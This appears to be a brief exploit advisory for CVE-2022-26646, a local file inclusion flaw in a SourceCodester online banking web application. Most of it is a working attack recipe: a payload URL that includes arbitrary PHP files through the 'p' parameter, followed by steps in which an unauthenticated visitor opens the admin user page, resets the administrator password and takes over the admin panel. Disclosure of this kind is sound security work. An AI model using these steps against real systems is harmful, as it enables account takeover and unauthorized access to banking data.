CVE: CVE-2022-26646
Vendor Homepage: https://www.sourcecodester.com/
Software Link: Online Banking System
Description: The parameter "p" and "page" includes files. An unauthenticated user can read internal php files of the web. LFI to Privilege Escalation
- Null session account to admin
- Payload used:
http://web.com/banking/?p=<any_phpfile>
- 1- Go to home page http://localhost/banking/?p=about
- 2- Load the admin user page http://localhost/banking/?p=admin/user/index
- 3- Change the admin password
- 4- Login as administrator
- 5- Admin panel
Reading info.php